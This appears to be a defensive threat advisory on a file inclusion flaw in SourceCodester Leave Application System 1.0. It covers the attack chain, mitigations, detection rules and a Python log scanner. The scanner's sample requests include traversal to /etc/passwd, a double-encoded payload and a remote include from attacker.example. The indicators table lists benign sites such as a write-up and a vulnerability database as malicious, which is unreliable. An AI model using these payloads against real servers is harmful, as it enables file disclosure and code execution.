SourceCodester Leave Application System 1.0 File Inclusion Vulnerability (CVE-2026-5210)
SourceCodester Leave Application System 1.0 is vulnerable to remote file inclusion (CVE-2026-5210) due to improper handling of the 'page' argument, potentially allowing attackers to execute arbitrary code.
SourceCodester Leave Application System version 1.0 is vulnerable to a file inclusion vulnerability (CVE-2026-5210). This vulnerability allows a remote attacker to include arbitrary files on the server by manipulating the page argument in a request. The vulnerability exists because the application fails to properly sanitize user-supplied input, leading to the inclusion of potentially malicious files. Public exploits are available, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations using the affected application, as it can lead to remote code execution and data exfiltration.
Attack Chain
- The attacker identifies a page within the SourceCodester Leave Application System 1.0 that uses the `page` parameter to include files.
- The attacker crafts a malicious URL containing the `page` parameter, injecting a path to a local file (e.g., `../../../../etc/passwd`) or a remote file via a URL.
- The vulnerable application processes the attacker-supplied `page` parameter without proper sanitization or validation.
- The application attempts to include the file specified by the attacker's malicious URL.
- If the file is successfully included, the attacker can read sensitive information (e.g., `/etc/passwd`, database configuration files).
- If the attacker can include a PHP file (e.g., via a log poisoning attack), they can achieve remote code execution on the server.
- The attacker executes arbitrary commands on the server with the privileges of the web server user.
- The attacker can then pivot to other systems, install malware, or exfiltrate sensitive data.
Impact
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, and user credentials. Remote code execution is possible if the attacker can include a PHP file, potentially leading to complete system compromise. This could impact all users of the Leave Application System, potentially exposing employee data.
Recommendation
- Apply available patches or upgrade to a secure version of SourceCodester Leave Application System to remediate CVE-2026-5210.
- Deploy the provided Sigma rule to detect attempts to exploit the file inclusion vulnerability by monitoring for suspicious `page` parameter values in web server logs.
- Implement strict input validation and sanitization for all user-supplied input, especially parameters used for file inclusion.
- Restrict file system access for the web server user to only the necessary directories to prevent unauthorized file access.
- Monitor web server logs for access to sensitive files, such as `/etc/passwd`, database configuration files, and application source code.
- Block the reported malicious URL `https://medium.com/@hemantrajbhati5555/local-file-inclusion-lfi-in-leave-application-system-php-sqlite3-4e095bb7ee40` at the network perimeter.
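The log-monitoring recommendation above, worked through as an added example (not the vendor's or the detection platform's code): a small Python checker that pulls every `page` parameter value out of access-log request lines, decodes it (including double URL encoding), and labels it with the inclusion patterns it matches. The log format, the regex names and the sample log lines are constructed for illustration; adapt the request-line regex to your server's format.

```python
# Added example: flag suspicious `page` parameter values in constructed access logs.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log: "GET /path?q HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Patterns typical of local/remote file inclusion attempts (checked in this order)
SUSPICIOUS = [
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("absolute_path", re.compile(r"^(/|[a-zA-Z]:\\)")),
    ("remote_url", re.compile(r"^(https?|ftp|smb)://", re.I)),
    ("php_wrapper", re.compile(r"^(php|data|expect|phar)://", re.I)),
    ("null_byte", re.compile(r"\x00")),
    ("sensitive_file", re.compile(r"etc/(passwd|shadow)|proc/self", re.I)),
]

def page_values(request_uri):
    """Return all decoded values of the `page` parameter in a request URI."""
    query = urlsplit(request_uri).query
    values = parse_qs(query, keep_blank_values=True).get("page", [])
    # parse_qs decodes once; decode again so double-encoded payloads are visible
    return [unquote(v) for v in values]

def classify(value):
    """Return the names of all suspicious patterns matched by one page value."""
    return [name for name, rx in SUSPICIOUS if rx.search(value)]

def scan_log(lines):
    """Return (line_no, decoded_value, reasons) for each suspicious page value."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for v in page_values(m.group(1)):
            reasons = classify(v)
            if reasons:
                hits.append((n, v, reasons))
    return hits

# Constructed sample access-log lines (not real traffic); hosts are placeholders
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET /index.php?page=dashboard HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2026:10:00:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1893',
    '10.0.0.9 - - [01/Jan/2026:10:00:02 +0000] "GET /index.php?page=%252e%252e%252fconfig.php HTTP/1.1" 200 300',
    '10.0.0.9 - - [01/Jan/2026:10:00:03 +0000] "GET /index.php?page=http://attacker.example/remote.txt HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for n, v, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: page={v!r} -> {', '.join(reasons)}")
```

The legitimate `page=dashboard` request produces no hit, while the traversal, double-encoded and remote-URL requests are each reported with the patterns they matched; tune the `SUSPICIOUS` list to the page names your deployment actually serves.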
Detection coverage
- Detect LFI Attempts via Page Parameter (high): Detects attempts to exploit LFI vulnerabilities by analyzing the 'page' parameter in HTTP requests.
- Detect access to sensitive files via web server (medium): Detects access to common sensitive files via web requests that may indicate LFI or other vulnerabilities.
Indicators of compromise
| Type | Value |
|---|---|
| url | https://medium.com/@hemantrajbhati5555/local-file-inclusion-lfi-in-leave-application-system-php-sqlite3-4e095bb7ee40 |
| url | https://vuldb.com/submit/780419 |
| url | https://vuldb.com/vuln/354346 |
| url | https://vuldb.com/vuln/354346/cti |
| url | https://www.sourcecodester.com/ |